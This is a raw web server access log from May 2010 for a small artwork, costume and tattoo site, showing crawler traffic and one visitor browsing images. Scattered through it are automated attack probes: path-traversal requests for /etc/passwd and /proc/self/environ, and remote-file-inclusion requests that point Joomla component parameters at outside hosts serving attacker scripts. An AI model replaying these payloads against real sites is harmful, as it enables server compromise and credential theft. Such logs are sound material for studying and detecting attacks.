208.115.111.248 - - [11/May/2010:13:27:29 -0500] "GET /artwork/banners.htm HTTP/1.1" 200 3537 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:31 -0500] "GET /artwork/coffins.htm HTTP/1.1" 200 1485 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:33 -0500] "GET /artwork/dressers.htm HTTP/1.1" 200 1093 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:36 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 200 1007 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:38 -0500] "GET /artwork/mirrors.htm HTTP/1.1" 200 1118 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:40 -0500] "GET /artwork/mobiles.htm HTTP/1.1" 200 986 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:42 -0500] "GET /artwork/music.htm HTTP/1.1" 200 577 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:45 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 200 1591 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:48 -0500] "GET /artwork/tombio.htm HTTP/1.1" 404 302 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:13:27:50 -0500] "GET /artwork/trunks.htm HTTP/1.1" 200 1275 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
94.23.15.24 - - [11/May/2010:13:30:12 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.15.24 - - [11/May/2010:13:30:12 -0500] "GET /index.php?option=com_fabrik&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.15.24 - - [11/May/2010:13:30:12 -0500] "GET /logs/index.php?option=com_fabrik&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
59.21.247.137 - - [11/May/2010:13:32:18 -0500] "GET //write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
59.21.247.137 - - [11/May/2010:13:32:18 -0500] "GET /logs//write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
59.21.247.137 - - [11/May/2010:13:32:18 -0500] "GET /logs/access_log.1264723200//write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
59.21.247.137 - - [11/May/2010:13:32:24 -0500] "GET /logs/access_log.1263081600//write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.194.139 - - [11/May/2010:13:34:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.139 - - [11/May/2010:13:34:44 -0500] "GET /costume/costume86%20copy.JPG HTTP/1.1" 200 15576 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
216.129.119.44 - - [11/May/2010:13:44:01 -0500] "GET /logs/access_log.1220140800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
210.109.102.158 - - [11/May/2010:13:46:42 -0500] "GET /logs/access_log.1270771200/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:13:46:43 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:13:46:44 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
124.0.74.195 - - [11/May/2010:13:47:54 -0500] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:13:47:54 -0500] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:13:47:54 -0500] "GET /logs/access_log.1217376000//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:13:47:54 -0500] "GET /logs/access_log.1237420800//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.195.112.180 - - [11/May/2010:13:48:30 -0500] "GET /logs/access_log.1212710400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.149.105.8 - - [11/May/2010:13:51:22 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:13:51:22 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:13:51:23 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.194.116 - - [11/May/2010:13:53:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.116 - - [11/May/2010:13:53:46 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
213.149.105.8 - - [11/May/2010:13:53:53 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.194.123 - - [11/May/2010:13:58:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.123 - - [11/May/2010:13:58:38 -0500] "GET /costume/costume61%20copy.JPG HTTP/1.1" 200 18054 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.123 - - [11/May/2010:13:58:38 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
95.131.64.69 - - [11/May/2010:14:02:37 -0500] "GET /logs/access_log.1273190400%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:14:02:37 -0500] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:14:02:37 -0500] "GET //index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.218.116.134 - - [11/May/2010:14:02:46 -0500] "GET /logs/access_log.1235260800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [11/May/2010:14:02:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
95.131.64.69 - - [11/May/2010:14:03:41 -0500] "GET //index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:14:03:41 -0500] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:14:03:41 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.204.191 - - [11/May/2010:14:05:10 -0500] "GET /logs/access_log.1184803200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.149.105.8 - - [11/May/2010:14:05:32 -0500] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:14:05:32 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.46.204.190 - - [11/May/2010:14:06:10 -0500] "GET /logs/access_log.1218931200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.149.105.8 - - [11/May/2010:14:08:32 -0500] "GET /logs/access_log.1270598400/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:14:08:33 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:14:08:33 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:14:12:13 -0500] "GET /logs/access_log.1268870400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [11/May/2010:14:12:51 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [11/May/2010:14:12:51 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [11/May/2010:14:13:21 -0500] "GET / HTTP/1.1" 200 1003 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.217.161.222 - - [11/May/2010:14:15:07 -0500] "GET /logs/access_log.1270598400//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
67.217.161.222 - - [11/May/2010:14:15:07 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
67.217.161.222 - - [11/May/2010:14:15:07 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:14:16:36 -0500] "GET /logs/access_log.1207612800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.217.161.222 - - [11/May/2010:14:18:47 -0500] "GET /logs/access_log.1270598400//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
67.217.161.222 - - [11/May/2010:14:18:47 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
67.217.161.222 - - [11/May/2010:14:18:47 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:14:23:28 -0500] "GET /logs/access_log.1204156800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [11/May/2010:14:24:12 -0500] "GET /logs/access_log.1271808000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:14:25:20 -0500] "GET /logs/access_log.1200096000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.43 - - [11/May/2010:14:29:03 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [11/May/2010:14:30:26 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [11/May/2010:14:31:59 -0500] "GET /logs/access_log.1273017600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.196 - - [11/May/2010:14:32:39 -0500] "GET /logs/?M=D HTTP/1.1" 200 5130 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.166 - - [11/May/2010:14:35:24 -0500] "GET /logs/access_log.1214179200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
213.239.210.93 - - [11/May/2010:14:38:07 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
213.239.210.93 - - [11/May/2010:14:38:07 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.239.210.93 - - [11/May/2010:14:38:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.48.249.151 - - [11/May/2010:14:39:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
87.250.255.243 - - [11/May/2010:14:39:15 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
59.21.247.137 - - [11/May/2010:14:42:48 -0500] "GET /write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.21.247.137 - - [11/May/2010:14:42:48 -0500] "GET /logs/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.21.247.137 - - [11/May/2010:14:42:48 -0500] "GET /logs/access_log.1265068800/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.109.102.158 - - [11/May/2010:14:42:51 -0500] "GET /logs/access_log.1242432000/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:14:42:52 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:14:42:53 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
217.172.150.13 - - [11/May/2010:14:45:14 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 344 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:14:45:14 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
59.21.247.137 - - [11/May/2010:14:45:23 -0500] "GET /logs/access_log.1262476800/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:50 -0500] "GET /logs//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:50 -0500] "GET /logs/access_log.1266451200//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:50 -0500] "GET //?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:53 -0500] "GET //?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:53 -0500] "GET /logs//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:53 -0500] "GET /logs/access_log.1266451200//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:53 -0500] "GET /logs/access_log.1266451200//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:53 -0500] "GET //?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:53 -0500] "GET /logs//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:53 -0500] "GET /logs/access_log.1265760000//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:59 -0500] "GET //?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:59 -0500] "GET /logs/access_log.1266451200//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:59 -0500] "GET /logs/access_log.1265760000//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:48:59 -0500] "GET /logs//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:49:02 -0500] "GET /logs/access_log.1265760000//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:14:49:03 -0500] "GET /logs/access_log.1265760000//?_zb_path/e404.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
194.108.112.112 - - [11/May/2010:14:49:24 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:14:49:25 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
87.250.255.243 - - [11/May/2010:14:50:10 -0500] "GET /logs/access_log.1272240000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.133 - - [11/May/2010:14:54:39 -0500] "GET /logs/access_log.1235433600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:14:58:21 -0500] "GET /logs/access_log.1270512000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.194.43 - - [11/May/2010:15:00:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.43 - - [11/May/2010:15:00:58 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.1.47.47 - - [11/May/2010:15:01:43 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.1.47.47 - - [11/May/2010:15:01:43 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:15:06:31 -0500] "GET /artwork/coffins.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
38.99.96.252 - - [11/May/2010:15:09:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.99.96.252 - - [11/May/2010:15:09:05 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.99.96.252 - - [11/May/2010:15:09:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
67.195.112.180 - - [11/May/2010:15:11:06 -0500] "GET /logs/access_log.1161043200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.19.4.18 - - [11/May/2010:15:13:34 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
203.19.4.18 - - [11/May/2010:15:13:37 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:15:17:04 -0500] "GET /logs/access_log.1255305600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [11/May/2010:15:17:25 -0500] "GET /logs/access_log.1271894400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.195 - - [11/May/2010:15:18:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:15:25:36 -0500] "GET /logs/access_log.1271030400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
201.251.0.249 - - [11/May/2010:15:27:21 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:21 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:31 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:31 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:31 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:32 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:32 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:32 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:32 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:32 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:33 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:34 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
201.251.0.249 - - [11/May/2010:15:27:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
